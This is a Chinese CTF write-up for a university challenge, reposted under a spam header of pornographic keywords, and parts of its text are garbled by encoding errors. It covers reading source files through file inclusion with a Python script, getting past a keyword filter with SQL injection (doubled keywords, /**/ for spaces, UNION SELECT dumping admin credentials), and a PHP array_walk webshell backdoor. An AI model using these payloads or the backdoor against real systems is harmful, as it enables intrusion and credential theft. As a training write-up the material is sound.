日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

南邮CTF综合题2

發(fā)布時(shí)間:2024/3/24 编程问答 47 豆豆
生活随笔 收集整理的這篇文章主要介紹了 南邮CTF综合题2 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

南郵CTF綜合題2----小白的第一篇

在自己加別人的WP的幫助下終于完成了這道十分有價(jià)值的CTF題目

首先我們看到題目的主體界面

其他的都沒有意義,我們首先看到的是輸入框,很自然的就想到XSS或者SQL,但是發(fā)表留言之后彈出非XSS的彈框,這就意味著這道題很大可能是SQL注入

我們先看留言搜索輸入1后

這需要修改USER-AGENT但是我們并不知道這個(gè)可以通過驗(yàn)證的USER-AGENT是什么,所以往下看

看到一個(gè)CMS說明

很明顯的提醒了,我們應(yīng)該先從這里入手

看文章內(nèi)容,他給了兩個(gè)提示

一個(gè)是文件:config.php,index.php,passencode.php,say.php

另一個(gè)是admin的表結(jié)構(gòu),這里更加確信是SQL注入了

注意到這里的URL是應(yīng)該是存在文件包含的(不然給我們文件名稱干什么),我們?cè)囈幌?/p>

file=index.php

果然,文件的內(nèi)容被都取出來了

我們先把他下載下來,這里我寫了一個(gè)腳本

import requests import codecs from bs4 import BeautifulSoupurl="http://cms.nuptzj.cn/about.php?file=" file_list = ["index.php","passencode.php","say.php","config.php","antixss.php","about.php","so.php","antiinject.php","xlcteam.php"]for i in file_list:res = requests.get(url+i)print("dowload "+i)if res.status_code==200:res.encoding="utf8"with codecs.open(i,"w+","utf8") as handle:print("done")text = BeautifulSoup(res.text,"lxml").texthandle.write(text)

當(dāng)然里面的文件有些是后來發(fā)現(xiàn)的,我就先放在這里

先看index.php發(fā)現(xiàn)其包含了antixss.php應(yīng)該是預(yù)防XSS攻擊的,passencode.php是將用戶輸入的密碼存儲(chǔ)為ASCII碼的形式 say.php是處理用戶留言的,這時(shí)就陷入了苦惱

突然發(fā)現(xiàn),我們忘記了一個(gè)文件------讀取文件的about.php,下載下來之后發(fā)現(xiàn)存在敏感目錄loginxlcteam,看名字好像是登陸的

在URL中訪問,既然是目錄就應(yīng)該有index.php吧,先試一試

成功進(jìn)入后臺(tái)登陸界面,但是。。。。各種用戶名不存在。

查看源碼存在數(shù)據(jù)庫(kù)操作的php文件還有so.php,這個(gè)就是當(dāng)時(shí)搜索的php,先下載下來

驚奇的發(fā)現(xiàn)里面包含了antiinject.php這個(gè)應(yīng)該就是防止SQL注入的文件了,下載下載

<?php function antiinject($content){ $keyword=array("select","union","and","from",' ',"'",";",'"',"char","or","count","master","name","pass","admin","+","-","order","="); $info=strtolower($content); for($i=0;$i<=count($keyword);$i++){$info=str_replace($keyword[$i], '',$info); } return $info; } ?>

文件過濾了敏感的單詞,但是雙重繞過就好了

喪心病狂的過濾了空格,可以用/**/來繞過

先看一下搜索的源碼

$result=mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");

這里的$id沒有用''包裹,所以直接注入就好

先看一下回顯

soid=-1/**/UNunionION/**/SELselectECT/**/1,2,3,4

發(fā)現(xiàn)共四個(gè)參數(shù),顯示的是2,3

因?yàn)橹耙呀?jīng)了解到了表的結(jié)構(gòu),所以直接注入

soid=-1/**/UNunionION/**/SELselectECT/**/1,usernam=e,userpas=s,4/**/fro=m/**/admi=n

得到admin的password

102 117 99 107 114 117 110 116 117

之前說過password是ASCII碼存儲(chǔ)的,所以解碼得到admin的密碼

fuckruntu

登陸

emmmm一句話木馬,我們先把源碼下載下來

<?php $e = $_REQUEST['www']; $arr = array($_POST['wtf'] => '|.*|e',); array_walk($arr, $e, ''); ?>

三個(gè)參數(shù)的數(shù)組回調(diào)后門

先看一下目錄下面有什么文件

雖然亂碼,但我們還是看到了最后那個(gè)flag

看看前面的是什么

直接在文件包含那里面查看

成功拿到flag

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的南邮CTF综合题2的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。